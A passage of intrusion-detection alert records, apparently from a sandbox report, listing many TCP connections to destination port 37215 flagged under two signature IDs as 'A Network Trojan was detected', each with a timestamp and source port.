          Timestamp:06/09/24-16:33:34.914324
          SID:2835222
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286680
          SID:2835222
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222821
          SID:2835222
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414750
          SID:2829579
          Source Port:41736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104390
          SID:2835222
          Source Port:57660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291289
          SID:2835222
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282521
          SID:2835222
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004598
          SID:2835222
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930216
          SID:2829579
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950374
          SID:2835222
          Source Port:57100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294637
          SID:2829579
          Source Port:50198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305293
          SID:2829579
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644602
          SID:2835222
          Source Port:55260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560308
          SID:2829579
          Source Port:56462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818525
          SID:2829579
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133154
          SID:2835222
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030808
          SID:2835222
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858836
          SID:2835222
          Source Port:56676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567354
          SID:2829579
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540171
          SID:2829579
          Source Port:55584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029788
          SID:2835222
          Source Port:50774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465465
          SID:2829579
          Source Port:43600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902065
          SID:2835222
          Source Port:44536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227696
          SID:2829579
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694033
          SID:2835222
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490311
          SID:2835222
          Source Port:54564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081932
          SID:2829579
          Source Port:60894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000582
          SID:2829579
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818073
          SID:2829579
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205434
          SID:2829579
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538247
          SID:2829579
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2835222
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645986
          SID:2835222
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284247
          SID:2829579
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274314
          SID:2829579
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103864
          SID:2835222
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720575
          SID:2829579
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538711
          SID:2835222
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252247
          SID:2829579
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411746
          SID:2829579
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861158
          SID:2829579
          Source Port:49764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206910
          SID:2829579
          Source Port:50572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285747
          SID:2829579
          Source Port:49824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660835
          SID:2835222
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569472
          SID:2829579
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945894
          SID:2835222
          Source Port:50800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162177
          SID:2835222
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161958
          SID:2829579
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412393
          SID:2835222
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274938
          SID:2835222
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740967
          SID:2835222
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163395
          SID:2829579
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716286
          SID:2835222
          Source Port:50704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904572
          SID:2829579
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948122
          SID:2829579
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931611
          SID:2829579
          Source Port:46352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720395
          SID:2835222
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564800
          SID:2835222
          Source Port:37022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931487
          SID:2829579
          Source Port:59238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103226
          SID:2829579
          Source Port:52648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819012
          SID:2829579
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230774
          SID:2829579
          Source Port:58416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038028
          SID:2835222
          Source Port:33118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863309
          SID:2829579
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160184
          SID:2829579
          Source Port:52020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602649
          SID:2829579
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819039
          SID:2829579
          Source Port:55444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285583
          SID:2829579
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538238
          SID:2835222
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944749
          SID:2829579
          Source Port:41960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552861
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558871
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418961
          SID:2835222
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302747
          SID:2829579
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398866
          SID:2829579
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644752
          SID:2829579
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165694
          SID:2829579
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029911
          SID:2829579
          Source Port:46878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078274
          SID:2829579
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292142
          SID:2829579
          Source Port:43412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291307
          SID:2835222
          Source Port:57570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224178
          SID:2835222
          Source Port:43502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413235
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104504
          SID:2835222
          Source Port:57794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539697
          SID:2835222
          Source Port:59116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077532
          SID:2829579
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162427
          SID:2835222
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668649
          SID:2835222
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247165
          SID:2829579
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296936
          SID:2829579
          Source Port:33482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083056
          SID:2829579
          Source Port:34996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983354
          SID:2829579
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155867
          SID:2835222
          Source Port:57272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285124
          SID:2829579
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027259
          SID:2829579
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985308
          SID:2829579
          Source Port:54400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083056
          SID:2829579
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986479
          SID:2835222
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947638
          SID:2835222
          Source Port:35162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721406
          SID:2829579
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820926
          SID:2835222
          Source Port:54236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718939
          SID:2835222
          Source Port:45200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865767
          SID:2835222
          Source Port:49606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079246
          SID:2829579
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080607
          SID:2835222
          Source Port:36650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288356
          SID:2829579
          Source Port:54774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398031
          SID:2835222
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823246
          SID:2835222
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928233
          SID:2829579
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205227
          SID:2829579
          Source Port:40016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417348
          SID:2829579
          Source Port:54650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415437
          SID:2835222
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861997
          SID:2829579
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397381
          SID:2829579
          Source Port:56414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033419
          SID:2829579
          Source Port:42190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471996
          SID:2829579
          Source Port:54642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869047
          SID:2835222
          Source Port:53616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904312
          SID:2829579
          Source Port:53174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471952
          SID:2829579
          Source Port:57454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227313
          SID:2835222
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161119
          SID:2835222
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137877
          SID:2835222
          Source Port:53312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396506
          SID:2835222
          Source Port:52560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861187
          SID:2835222
          Source Port:34464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167690
          SID:2829579
          Source Port:49608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867995
          SID:2835222
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169266
          SID:2829579
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287088
          SID:2835222
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465312
          SID:2829579
          Source Port:38794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713770
          SID:2829579
          Source Port:47376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038231
          SID:2829579
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558796
          SID:2835222
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080543
          SID:2829579
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396321
          SID:2829579
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858755
          SID:2835222
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718883
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720694
          SID:2829579
          Source Port:35014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897134
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558370
          SID:2835222
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206556
          SID:2835222
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946743
          SID:2835222
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890509
          SID:2835222
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306517
          SID:2835222
          Source Port:39270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296952
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660410
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101999
          SID:2829579
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073927
          SID:2835222
          Source Port:38010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225717
          SID:2829579
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000737
          SID:2835222
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644926
          SID:2835222
          Source Port:39326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944869
          SID:2829579
          Source Port:52960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567579
          SID:2829579
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952075
          SID:2829579
          Source Port:43610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468488
          SID:2829579
          Source Port:36550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038752
          SID:2829579
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944969
          SID:2835222
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415341
          SID:2835222
          Source Port:49914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285943
          SID:2835222
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646316
          SID:2829579
          Source Port:34152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721172
          SID:2835222
          Source Port:45818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246035
          SID:2835222
          Source Port:47136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248867
          SID:2835222
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821604
          SID:2829579
          Source Port:60800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719654
          SID:2835222
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288285
          SID:2829579
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223267
          SID:2835222
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930018
          SID:2835222
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284321
          SID:2835222
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286812
          SID:2829579
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418393
          SID:2835222
          Source Port:50570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919510
          SID:2835222
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291256
          SID:2829579
          Source Port:37758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949875
          SID:2829579
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272038
          SID:2829579
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558290
          SID:2829579
          Source Port:59128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951122
          SID:2829579
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.992052
          SID:2835222
          Source Port:53772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926262
          SID:2835222
          Source Port:49168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161807
          SID:2835222
          Source Port:42734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823042
          SID:2829579
          Source Port:41604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038205
          SID:2829579
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167270
          SID:2835222
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127274
          SID:2829579
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715488
          SID:2835222
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864283
          SID:2835222
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224349
          SID:2829579
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946966
          SID:2835222
          Source Port:37088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721122
          SID:2835222
          Source Port:53900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398136
          SID:2829579
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719207
          SID:2835222
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636084
          SID:2829579
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985250
          SID:2835222
          Source Port:40870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645237
          SID:2835222
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821076
          SID:2829579
          Source Port:53024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000694
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416026
          SID:2829579
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161951
          SID:2829579
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646934
